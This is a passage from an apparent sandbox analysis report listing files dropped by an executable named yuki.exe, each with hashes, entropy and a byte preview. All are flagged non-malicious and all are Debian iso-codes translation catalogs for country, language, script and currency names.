                                                                                                    Preview:................,.......<.......P.......Q...w...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-02-09 15:15+0200.Last-Translator: Metin Amiroff <metin@karegen.com>.Language-Team: Azerbaijani <translation-team-az@lists.sourceforge.net>.Language: az.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Holland Antill.ri.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 26 messages, Project-Id-Version: iso_639-3 'Afrika'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1431
                                                                                                    Entropy (8bit):4.960255867660081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3m2bQSiDo3WWFt5wOpz+Vt0USnHmvORXmmwY0P0lWUyo:2228/rwIz+MUSGhmdJx1
                                                                                                    MD5:59E904E68A52F2C0AF7237BB5F8D721A
                                                                                                    SHA1:9DD8D750E8033BD78C1E19C400A58D08A941417E
                                                                                                    SHA-256:0A3963900F050430F43EC5F410AAB22C7AAA023F87E52C25F087D679240262DA
                                                                                                    SHA-512:DB2898D274B7E727C800E749352D359478D47949D34D96106A9D5D904689FDD4F5E93746F7EF8060C3FCE78FD156BA36AB7883F095897EC3151FCA1F024A02E8
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........P.......Q.......[.......b.......j.......s.......y...............................................................................................................................................................&...............................................................................................!.......+.......4.......<.......D.......L.......R.......\.......g.......p.......y................................................................................................................................................................................Afrikaans.Arabic.Chinese.Croatian.Dutch.Faroese.French.Hebrew.Hungarian.Icelandic.Indonesian.Irish.Italian.Japanese.Korean.Latvian.Lithuanian.Macedonian.Norwegian.Polish.Portuguese.Russian.Thai.Turkish.Vietnamese.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2001-07-28 11:19GMT+0200.Last-Translator: Vasif .smay.lo.lu <aze
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):526
                                                                                                    Entropy (8bit):5.289706156371071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i40ExxLtt02UkH/n/xtLL1hm/4FfzMXmBQWiOWRl:R0ijt0UH3tg/FXmGRl
                                                                                                    MD5:72E69251BDDEFB4FEF3C3FABE7577CCB
                                                                                                    SHA1:AF49B7E47EE55D8912DDE43C61B4D9861734A2B5
                                                                                                    SHA-256:57E335D7C30DB683F577C21EA36F018D9526F2B36DEFF86FE6D21659D788C7E8
                                                                                                    SHA-512:BF4451EB109B24D26DB92BF29A994A01F67AB8BED8C1BB65C75911BEF7B765D2538F804F054455EC37A6096D0ECAEA0D5872B46A16E8FCAF43B8D76D8BB558FE
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 01:29+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Bashkir <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ba/>.Language: ba.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 153 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6864
                                                                                                    Entropy (8bit):4.731637497302333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4bn6wPlAieC2HdiuSamRFNPA6hDTTW6PdzWPuK8JkayCleefaF/WWrXc0/UG9JWF:4bhiTIuHmRJhDT6GdzWPZ8yLS5kJUGnc
                                                                                                    MD5:63A9CDEE97C39F2FBCCDBB7E596F592A
                                                                                                    SHA1:BB38B03AFD4692F9F79D76D03469F15CBE48F25D
                                                                                                    SHA-256:648A7DBB3EBBE6F449C777FCDEF1A6924CF45FF048E0AD4408BDAD973E076218
                                                                                                    SHA-512:297455F6BD0546835917A8BC56C0A2BFB75B4BF206657DF3E57F124287D177B69908C1D8CB9546BFB174DBA541C4E199FB3260EB93B9FF6515749DA4B908E619
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................$.......,.......3.......G.......Q.......Y......._.......i.......q.......|....................................................................................................................... .......).......0.......5.......;.......D.......O.......W.......\.......e.......l.......{.......................................................................................................................................".......*......./.......9.......@.......F.......O.......Y.......a.......i.......o.......y.......~.......................................................................................................................................................#.......).......0.......8.......?.......H.......S.......[.......c.......k.......q.......w.......................................................................................................................".......).......2.......>.......D.......L.......U.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274\321\201\320\272\320\260\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12701
                                                                                                    Entropy (8bit):5.263797292433121
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dpzqMIoeltU4WjV9qWxa5hW8NT1T1hobWkZwZ4WvvKpKm2P6yyCE:vooeg4WjVDxa5hW8N0bwaWH83d
                                                                                                    MD5:7144F2AFC6EA84544F5099CF6D0D5FFF
                                                                                                    SHA1:D2420BA1544B64C453620C4E48AE38A46A21DCD0
                                                                                                    SHA-256:FCDD33624457851C5CE8E63FB8CD2711D4D34069097A68CF25BC1EB1E32463E1
                                                                                                    SHA-512:760E01ACCFAFA3260A4BD0858B69E9E9FC2C129685CD004C40DF6CD8874874D80D478DED4536D6D44E020C00CD22965FECAA500346ECB57CEBCA57B66222AE05
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\226\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30045
                                                                                                    Entropy (8bit):5.319502357833616
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oxGQe48fmsWP48WAI91qjlePG0QbleLBB5wXNQf8TIdMWEcE1ZRFCqiZc:bxBe48fkiG0QbleLBB5wXNQf8TfFCxZc
                                                                                                    MD5:E96C198894BAF4FF740F9B1C9A17920E
                                                                                                    SHA1:283D581C6244DA8FBC3ED9ED4E724923D684E803
                                                                                                    SHA-256:04BCE144C80AA116C2747FFE211DA4B6BC68525BFBBA6C778B7BCB8666E932D0
                                                                                                    SHA-512:E3A5FA0BA4D383BD15B65B6B70E77F38ED92E3CBBA55B6CF7CB8D2D8854E5F4B68C8210B5B3F2E5606269DAD38170672CE25B18EE40B844BA8D2282A14725040
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3778 messages, Project-Id-Version: iso_3166-2 '\320\255\321\236\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194548
                                                                                                    Entropy (8bit):5.452541267198276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:3QZtF+yxuKxqoJlx0RiGNOIddU9uPMD1tJM8z4g7t8HPZ2HKoBqtmQ/n7UZWHszv:AhkTCOi1IMDTJh42K4M2gXVCha0
                                                                                                    MD5:AE185AEF65C3A8C685C94B32F6425696
                                                                                                    SHA1:F2D95E8FB926F5F3BABA4D147765B3805469DF70
                                                                                                    SHA-256:EDDBD36F1D975F36860CCEFB799B8E1AE9C6821AA5585FD0AF573047506C4367
                                                                                                    SHA-512:FC146F8A94450D71EA42021A8BCAF0BFCF72A8CFDDB9E944E98AB02AD3D93D568A79EDB5FE3EB30D4E44382551A16F95552CEF480F34067EDD5C2E5C4A71CBB7
                                                                                                    Malicious:false
                                                                                                    Preview:................,v......<........:.......:.......:.......;.......;.......;......!;....../;......4;......9;......B;......G;......O;......X;......d;......i;......q;......{;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<......$<......3<......8<......D<......J<......X<......^<......k<......q<......z<......~<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=......"=......-=......9=......G=......P=......\=......m=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......=.......>.......>.......>......!>.......>......8>......G>......U>......e>......p>......|>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......>.......?.......?.......?.......?......(?......0?......7?......>?......G?......W?......o?......|?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\321\213\321\202\320\260\320\275\321\201\320\272\321\226\321\217 \321\202\321\215\321\200\321\213\321\202\320\276\321\200\321\213\321\226 \321\236 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\321\213\320\264\320\267\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3661
                                                                                                    Entropy (8bit):5.590298325450756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3H1HItnldZ+vGqIfdvqN5CoUZAtzBZ1AGRPiYG3I1eBwIiDWVddX0FTJPQvzr:rLvADZ+yaCoMWzT1IVSUdVWTJW
                                                                                                    MD5:98802D713898666E89D9F1806A09D2EC
                                                                                                    SHA1:3145B7F9D3EFF93CDB6A65CBC0A3FA87C01457B4
                                                                                                    SHA-256:358F2DB07FB16402124DA3E4BFEB19A1E49EE294B55F02E8D147AFA587CF13D3
                                                                                                    SHA-512:637E93DC8EAC53F389BB0B60B06CEC3C165BC2EBA339429ED68A30652BACD99BCEA471F59A1CCAA1D69A2005DB72715EF1E128C1DAFA78DFA7068DC696FB6862
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............&.......A......._...V...W.......".......L...1.......~..."...............$.......@.......X...0...D.......).......................>...4.......s...........Q...............$...........@...!...K...9...m...S.......1.......>...-.......l...J.......^....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\320\240\320\260\320\267\320\273\321\226\320\272\320\276\320\262\320\260\321\217 \320\260\320\264\320\267\321\226\320\275\320\272\320\260 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12256
                                                                                                    Entropy (8bit):5.283308785249877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFbD8kCemeXeh6VRyK0G/2LCntxtz+VVHJHMAYNcVmQHs1ZbBlvA3MdspPwEUgG:ShqeJeh6TL0G/Uo/tzcVpJY4s1Zbbyfi
                                                                                                    MD5:01B1409616A3A5E9EDC03AF35039A5B3
                                                                                                    SHA1:0A6B33480230DE424EA1F5CBAF52F210616CCFE0
                                                                                                    SHA-256:2D6C13DC593BDE897C4C03E128962F37BC02F62D851506452249A7AF7BA16773
                                                                                                    SHA-512:E7D8FDEC2E3B85201B1530AA0845D015619FB77CC17349204F524A25794B362FC15F94DC26BDC43BD7D619A6BEBBAC3B6FBDA2AAF3781868795D1AFB128C0324
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\321\205\320\260\320\267\321\201\320\272\320\260\321\217'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18766
                                                                                                    Entropy (8bit):5.075606421790236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:tV5e1PW7dDjeCpkutJWm2YxN3sOyb1N0m+cCSWrg5:tVoIeanPWPN0xc2rg5
                                                                                                    MD5:A50098DC7344E9B1E8DDDCCE8A076E98
                                                                                                    SHA1:1B071DB5C10A1E9D2FCCA104BE015E7CB3A4FD82
                                                                                                    SHA-256:EA7E4C947451E63F0315B8C45B1817E7F70BB2F45C23E9FCE3EB69C6E60C16DA
                                                                                                    SHA-512:EDB5AEEF2C5B0C8A374DA4BAAD1C6F1C9DCDC59559C81817120C0DA3E503B54315A88769A71AEBB15B1FC02AFE67166B4E12BBECE03EFCB987096EBCEEB5E617
                                                                                                    Malicious:false
                                                                                                    Preview:........p...............................................................................................................................'...............5.......?.......G.......N.......W.......`.......g.......o.......v.......}................................................................................................................................ ....... ....... ....... ......! ......( ......0 ......6 ......= ......E ......N ......U ......^ ......f ......o ......x ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!.......!......#!......)!......G!......M!......V!......f!......k!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......="......X"......a"......g"......j"......w"......."......."......."......."......."..#....".......".......".......".......".......".......#.......#......%#......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\260\320\267\321\226\320\271\321\201\320\272\321\226\321\217 \320\274\320\276\320\262\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9437
                                                                                                    Entropy (8bit):5.21823269590767
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx1EDqvqEji9ESE0BfNcaKsvx0NRGsB0duUVs3Kzc3tekTUsFAIAjVA8KLVbsM:XPJq/E0BfNcaKsvx0NRGsB0duUVsazc7
                                                                                                    MD5:8B588E45EB25BB8041CAF8F11322B758
                                                                                                    SHA1:E88B7CFDA338AF7D1FA8A0EF896267718E0DA45D
                                                                                                    SHA-256:EF5AFC22BB18FD818DCEA697E16E88C1A591464760FC62577A67109430A8CD12
                                                                                                    SHA-512:07F5AC1D72B962415993BE1B363F70126542BEC7FFB2188080329EF93676973D1F870F8A254326651404D23BD1C0B7D8688DB48E69DBE3526FA80181B01BDEDD
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................3...!...S.......u...........!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274\321\201\320\272\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2003
                                                                                                    Entropy (8bit):5.290363468470332
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VlVO4J5hiJ6xwE4j1K+k+DESlUFk5NFV+coUYxfhf+qmwK:3VTJ5h+MwJNwSlqKFIN/Y
                                                                                                    MD5:F01B76B57D21F9AA924012A0E17BA8F0
                                                                                                    SHA1:6F1C1BEA3BF3DF9F967F1757B59BD4B6942FBE5B
                                                                                                    SHA-256:7A4D0E7484592B5B20E7569EAFE6812A64D63D3BC0340DA3E885C31B719B92D0
                                                                                                    SHA-512:46FB762A1FEE86517A9BBB87CFF8D307890AE61C114A73E38879B758B3A8DE0F43559BB13600D67510C2164ED65FE72C9EBD45E82219982212E4FD70DD6917AB
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................'...............4.......=.......D.......M.......V.......\.......|.......................................................................................................................................................).......6.......E...%...V.......|.......................................................................).......:.......Z.......m................................................................................................................................................................................................................Adlam.Afaka.Arabic.Armenian.Balinese.Bengali.Braille.Caucasian Albanian.Cherokee.Coptic.Cyrillic.Egyptian hieroglyphs.Gothic.Greek.Gujarati.Hebrew.Hiragana.Katakana.Khmer.Korean (alias for Hangul + Han).Lao.Latin.Mayan hieroglyphs.Mongolian.Old Persian.Runic.Tamil.Telugu.Thai.Tibetan.Project-Id-Version: iso_15
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28945
                                                                                                    Entropy (8bit):5.235690201180512
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oX+9Xl48fmsWP48WAICRKiMH4dP3kPyiR/LtW:bsXl48cdg4dP3cXi
                                                                                                    MD5:D57FF900DAFC190DAB038B5CD5256257
                                                                                                    SHA1:0FDCA74D17F8EA97A3B9FD0E812F730E2B1FC340
                                                                                                    SHA-256:5E21F0EBF58ABBF67CD1BB2D1AEEC0C5603FB786771F12CBC9DD78A542201346
                                                                                                    SHA-512:79EC4FEFA82D4CE5C7E0AE60855B551F3619C2A565EAE97E9622C44CC6229FA0BA4D92ACB17EE689E5B0066E363D6F72B215B2C7CF7B06D245CC8C76C92C5E97
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 319 messages, Project-Id-Version: iso_3166-2 '\320\220\320\261\321\203 \320\224\320\260\320\261\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15883
                                                                                                    Entropy (8bit):5.087374222254468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:TPZCnOjFljhpeLK/yZu6+g4+kbUksmh/mJiaQnRV+uOOE:TwOjT8y+kbUnM+7OE
                                                                                                    MD5:449C6ED46EDBE76C24B41CD2BE527047
                                                                                                    SHA1:C280D6C0A226B1382FA4D84B5B2B392E7B4DB304
                                                                                                    SHA-256:45FBF65DA90EF0A79B3B0979520016E31EBCB7124CA34FAC1EBB9393817CD829
                                                                                                    SHA-512:0FAE353D0105667A7B428C1A375932C2FAB8047BF9F76BF71EDA455BC16BA36C7F00206B07971FE761B7801CDFC02A2647A90541265DB3D0A5653596AADFBDC6
                                                                                                    Malicious:false
                                                                                                    Preview:........?............................................................................................................... .......'......./.......8.......>.......I.......N.......h.......o.......v.......~...............................................................................................................................................(.......4.......A.......H.......N.......W.......b.......k.......s...............................................................................................................................$.......1.......7.......=.......E.......Z.......f.......o.......w.......~...............................................................................................................................................$.......,.......6.......C.......O.......Y.......c.......o.......z...............................................................................................................................................................'.......,.......5.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\270 \320\260\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\265\321\201\320\272\320\270 \321\202\320\265\321\200\320\270\321\202\320\276\321\200\320\270\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3381
                                                                                                    Entropy (8bit):5.452959027597132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3BxOl+vGqIfdvqN5CoUA0fxaDpOVe8ATkIUESciVmSD3hO4XI6ik:rLvBxe+yaCoWSOV8TkptOo
                                                                                                    MD5:EFB4F2078E9ADF747FA60F227AF70F1F
                                                                                                    SHA1:BD380A75FC6B0CA0525D7ED7600B56DF81A48A0D
                                                                                                    SHA-256:6A34BF1F99CB4C04E88CA8184BE55424705B95C18C94ACB8737C7365F21B6485
                                                                                                    SHA-512:47B4797314EF453686EE974A1965F27D33F5AC2B60842E2926E918D81B12C0DFE08232E7A848D4783C985C90853D02CC96B9A627FFE26E8CC15E016EF505AD6E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................@.......[...........+...1...E...d...w...........#...............(...'...%...P...H...v...>.......)...........(.......D.......`...................'.......(.......#...........).......4...0...L...^...}...).......;...........B...`...X...^....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 394 messages, Project-Id-Version: iso_639-3 '\320\220\320\261\321\205\320\260\320\267\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24471
                                                                                                    Entropy (8bit):5.222805655950827
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:sVB0D35tSiNdGY9/e0Ja0wRD3bktKjHad5I/XcLQ/1WI54OJMzAw1AHkq7mUprda:V5Q2EgSlAtKHVkERJMRcPprd5/dSXoJY
                                                                                                    MD5:2B941067DCCB9B569EB5893FDBFD22BF
                                                                                                    SHA1:D40A24EC3A3D2F06A7B03B630040E37DFB8C3CDC
                                                                                                    SHA-256:2BFE5A434E9A05AC96CAF1C633B3F2CCA577DAF60312923CD54E9C62CE75BD1D
                                                                                                    SHA-512:6E2160E4309CEC3176FEF6987B2B60C8E6A84E52295601D6ACA2199997E68E5E6DEA77626BE57B2451A600C4E931BAB248B56A769FB2E1259B87356F4E51A54D
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............0!......1!......;!......D!......J!......R!......Y!......^!......g!......q!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."...... "....../"......9"......Y"......v"......~".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......&#.......#......6#......=#......M#......U#......\#......a#......l#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$......:$......L$......T$......\$......k$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......%%......-%......@%......T%......e%......l%......t%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......)&......>&......R&......f&......|&.......&.......&.......&......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):526
                                                                                                    Entropy (8bit):5.281829884387048
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i40ExxLtt02UkI06/9/xtLLZ/4FnIXmBQWiOWRl:R0ijt0UIttB/FXmGRl
                                                                                                    MD5:29CE07252BBB552E6118471C040D22B1
                                                                                                    SHA1:081D816882ED408D373FB3B2F667B3E252538E96
                                                                                                    SHA-256:FD5201C69D6B84A55D9E850C08919D1F0EEDBA7CE3507FD58D7629CFDB2852B5
                                                                                                    SHA-512:852B0CFF13D06346F4B788DFE00246507659978DA3A98BDE49D092526A280F744A1F3E5F34ABD5FBE62587EDD7119D226AF63B8DF9B8775A573AEDB5C38C3C32
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 20:03+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Bislama <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/bi/>.Language: bi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\244\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35751
                                                                                                    Entropy (8bit):4.952700643634092
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:sxqI3ItU++YozmotmsWP4XWAIw6kNwcOX42dszX8ZrX6HxHariXdRXdydpdftCds:4qkItH+z9HT/HErurGjV281MMPREyKxO
                                                                                                    MD5:7F885067D2CD984B8835B7DEA149B84A
                                                                                                    SHA1:1BF8FE8DEC3107FCAF48AA1C5B79E1088BC2E464
                                                                                                    SHA-256:6AC8418F3C54F03ED7431CD92ECB809B60FAC647AA728C6D91169C8CDF13EF8C
                                                                                                    SHA-512:4553A82F3491EC793D6DE95162749CEED796E13D81F2DA64A70DE3B239DD0E8F5B05904BE87E36E4E8E0ADF3FDA8119BBD995F4584473B9D9F70390BF53A181F
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\246\260\340\246\277\340\246\237\340\246\277\340\246\266 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\246\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4015
                                                                                                    Entropy (8bit):5.124582486843154
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qD0vWKyBoZ52XoQUXggt7X6G2Z2XhZ+5hC03XampXsYPdIPl:qDyWWZAXbUXxt7XDXh+Y03XdpXTPdIPl
                                                                                                    MD5:D5538B057BC68DEF3BF28E3BB7255441
                                                                                                    SHA1:514E34ED6AED503B19682122F5796B7895B0B485
                                                                                                    SHA-256:3D47986D890D3EBB7F54EEC4C7FCEDE75AAAAC8DB400D050A504C8F5D7B64BF7
